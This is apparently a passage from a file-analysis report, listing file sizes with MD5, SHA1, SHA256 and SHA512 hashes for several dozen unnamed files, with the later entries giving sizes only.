SHA256f4895af32ddeb7d12599f2b3b9675439b44421b855cbcc7143bcbd3e7311aacb
SHA512293fee87e22b2c0a89a5cbadae2e9131be6a6b8ca4841321c78b7d761867a53ade56392c5df023ccd5bde0678555cc3466964e776e3932c3d3349493201272fa
-
Filesize
22KB
MD52479967ec4a8262827f40a643ab453a7
SHA152578d2a37f6fc988668d8be935e5ffce5aaddbb
SHA25600263f9faa93d08440227b7d72fc1ad92cde070d2fbd5ea2b157f91ef4f3a991
SHA512cea94e866a94a0a13c01f438277a675835638e158216cfb30f99b65deb749d9c384598a1630c9019c55ad5f9e7ab67ed09f3f3892d11e3d8d705bfcb963e66ba
-
Filesize
25KB
MD581dc67f91206e4c216b023876f752135
SHA1d94803b5e9d7b7807b2bfbf88a65efd8e6753fac
SHA256fbc173e790c8649a6d9d1e5e85c3e1857fbe9ac2574e9cb51d94bedeff5ab57f
SHA512afe39068d8cbfeb38f9297b79903522cec263311c4aaa0401160ff946218845a3a828851b3028e4543459b2057d48e498aa947ae5a58bb79041e2fb40a64b60c
-
Filesize
659B
MD5827c47061bb2b7aa8142bfb22e7992fa
SHA15f945e6605f3dffa680b9c95356f2355ea4a4699
SHA256975268d1fb2dfd10db1f63c5c9a61786d180f4e31b18b2b004f82b641ba1ab73
SHA512065b57b847ca85d1fae916c0f9f48dbd433ee62aba1d5b6423aa0035018b1c3754f57ef36fad6fd8a6a86da726029872e5d36a650cfab483e8e5c4f479787cdf
-
Filesize
982B
MD5e5920123ea68d736012a1c76726c9d02
SHA10a9ddfc19029f148256905f196ac9061e9d33a65
SHA2562027bed23921c32e598f8e19659cadecdc943b4bba865c915f05b7594a4a21e7
SHA512456d34466ff972a1a8140b19aa3f648d5666d55602061d0eebdc6a09ee6052b0d38eb25ecba0e6a0e2bfddb9ad739ce138c1d4f4fce3d453d35dab918a9dd3b5
-
Filesize
1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
Filesize
116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
Filesize
372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
Filesize
17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
11KB
MD5bbf0229327e86adbd21ce7a91e920adb
SHA1a1018a90c6e513b6af27ddb68b73e321de07a59d
SHA256a4df814ca3bb6f363277ffcf6d9bdc5a6e57367d1f9c2cc2e5a20aac384b64cc
SHA512f4bb882bcfb3da62b222d3b1d585c67db59b1675ee0a3ab308714f44dfe63e05623ad6a3be3c4ae701f5d7be2b24d7dc9f99335609ea0240170915116cbc3d5d
-
Filesize
11KB
MD52e44894aa63a3f5b3aa7b81ffba03d9b
SHA1a388a2f75b5beb4980c65dc1da7945065f06f971
SHA2568bd096483502f832b8aafdffb463a44af45bdfac686c1073bb0d64509884f2e8
SHA5128bc255494cb10e35bdd7fd83ae8a13a842dc178b04173138b84f32b824b1796d9f61516689f55a1d0bf4e678a4a47fbf789f29e0934ad60b6577c2a0961db19d
-
Filesize
16KB
MD59ddd5993818cccf8f4fa1c6b9fa90df7
SHA1c8e74b94fbd43dc85d4727c4d93224364bc60a43
SHA2569b3ed036847818f6d202b6e8ad1591db67bee6472ad878b85179672a1ff89154
SHA51232d144ec3eac801e56fd3f5523110d35283fff91bf987971552cd57a3094dbd0dc83ca5211cacfde8a1238592a26303e6714f5c8dd964dde6b6e826f2a34dd10
-
Filesize
10KB
MD5a198e1df09ca0599fe45c63da53c9f4e
SHA1404deaee769c04a3405798e27d98d9730479a70a
SHA256398ed8332585d48390660407c1c2ccebeb0c51ae4e42544ec408e7fb13b76dac
SHA5120b12295b1839aa1f5a633ad436a5804647959d9c081ab6711130291e182588e368cba5355fd38dc179e1a8a0bec8d427e1721cf5325e71d8398f6fa9636220f8
-
Filesize
4KB
-
Filesize
5.0MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
1.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
8KB
-
Filesize
184KB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
184KB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
20KB
-
Filesize
1.1MB
-
Filesize
5.0MB
-
Filesize
1.1MB
-
Filesize
5.0MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
3.3MB
-
Filesize
304KB
-
Filesize
652KB
-
Filesize
304KB
-
Filesize
68KB
-
Filesize
6.6MB
-
Filesize
6.6MB
-
Filesize
2.7MB
-
Filesize
2.7MB
-
Filesize
2.7MB
-
Filesize
2.7MB
-
Filesize
2.7MB
-
Filesize
120KB
-
Filesize
120KB
-
Filesize
652KB
-
Filesize
104KB
-
Filesize
40KB
-
Filesize
600KB
-
Filesize
304KB
-
Filesize
200KB
-
Filesize
304KB
-
Filesize
6.5MB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
216KB
-
Filesize
68KB
-
Filesize
320KB